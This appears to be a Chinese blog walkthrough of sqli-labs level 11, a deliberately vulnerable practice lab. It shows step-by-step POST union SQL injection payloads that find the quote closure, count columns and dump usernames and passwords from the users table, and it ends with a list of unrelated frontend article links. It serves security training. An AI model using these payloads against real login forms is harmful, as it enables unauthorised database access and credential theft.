sqli-labs靶场 less 11

文章目录


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 ('、"、''、"")
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 11 POS联合注入

  • 题目类型:

细节:

Post输入框中,--+注释符不起作用,#注释符可以用

判断闭合方式

输入uname= a' 提示报错 ''1'' and password='' LIMIT 0,1'

根据报错得到,and连接用户名和密码

uname=1'--+ 没有提示报错,说明闭合成功,所以闭合方式是单引号

判断列数

uname=1'order+by+3--+

uname=1'order+by+2--+

无报错,说明该页面sql语句查询返回的字段数是二列

uname=1'union+select+1,2--+

联合注入报数据

uname=1'union+select+1,(select+substr((group_concat(username,password)),1,32)+from+users)--+

通过substr截取出全部数据

相关推荐
狂炫冰美式12 小时前
前端实时推送 & WebSocket 面试题(2026版)
前端·http·面试
JefferyXZF12 小时前
新手建站零门槛!Vercel+Cloudflare+Namesilo域名购买部署全流程
前端
yinuo12 小时前
微信浏览器缓存机制大揭秘:为什么你总刷不出新页面?
前端
拉不动的猪12 小时前
try...catch 核心与生态协作全解析
前端·javascript·vue.js
Xeon_CC12 小时前
在react-app-rewired工程项目中,调试AntVG6库源码包。
前端·react.js·前端框架
o***Z44813 小时前
前端无障碍开发检查清单,WCAG合规
前端
J***Q29213 小时前
前端CSS架构模式,BEM与ITCSS
前端·css
G***T69114 小时前
React性能优化实战,避免不必要的重渲染
前端·javascript·react.js
q***d17314 小时前
前端微前端部署方案,Nginx与Webpack
前端·nginx·webpack
y***548814 小时前
前端构建工具扩展,Webpack插件开发
前端·webpack·node.js